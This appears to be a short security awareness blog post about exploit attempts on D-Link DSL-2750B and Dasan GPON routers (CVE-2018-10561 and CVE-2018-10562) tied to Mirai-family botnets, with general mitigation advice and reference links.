Vulnerabilities are very common when it comes to IT security. A vulnerability is something that is a potential weakness for hackers to find and access the software or hardware on your devices. Think of your house as the system that is being attacked. If all the doors and windows are locked, then it is protected but, if your door is unlocked or windows are left open, your house is left unprotected to possible harm. That’s kind of what a vulnerability is – something that was overlooked or forgotten about that an attacker can use to gain access and create havoc. 

This leads us to the recent spike in exploit attempts targeting D-Link DSL-2750B and Dasan GPON routers. The two vulnerabilities: CVE-2018-10561, an authentication bypass flaw and CVE-2018-10562, a command injection which can result in remote code execution and continued communication between the adversary and your network. These CVEs have been exploited in several campaigns that have been linked to the Mirai and Santori (a variant of Mirai) botnets.

Most corporations don’t see this as a problem because they are using sophisticated hardware and not something that is considered a small home/office router. But what about the small business operators or companies that have employees who work from home, or third party suppliers? GPON routers are very popular and widely adopted by ISPs that offer fiber-optic internet. 

This is where understanding the vulnerability and being aware is so important. If a home user’s device was exploited and an attacker was able to gain access and compromise a corporate device, it could allow the attacker access into the company’s wider network – especially if the attacker is wanting to recruit devices to add to their botnet, which could be used to launch future attacks. Another reason IT staff should keep an eye on this type of activity, even if its false positive is that a potential attacker could be looking for ways into the network. These could be scans but they could also be targeted attempts knowing that IT and security staff may not be paying attention.

It is recommended to disable remote access and universal plug-and-play on vulnerable routers and changing any default login credentials or contact your ISP for blocking. 


References:

Dasan routers utilizing ZIND-GPON-25xx firmware and some H650 series GPON are susceptible (CVE-2018-10561 & CVE-2018-10562). Refer - [1] https://www.vpnmentor.com/tools/gpon-router-antidote-patch/   

D-Link DSL-2750B routers with firmware 1.01 to 1.03 are also susceptible to the accompanying command injection attempts. Refer - [2] https://www.exploit-db.com/exploits/44760/ 

https://www.esentire.com/news-and-events/security-advisories/increase-in-attacks-on-gpon-routers/ 

https://www.enterprisetimes.co.uk/2018/07/24/dasan-and-d-link-routers-face-new-attack/ 

https://www.scmagazineuk.com/dasan-d-link-routers-targeted-apparent-botnet-new-wave-exploit-attacks/article/1488662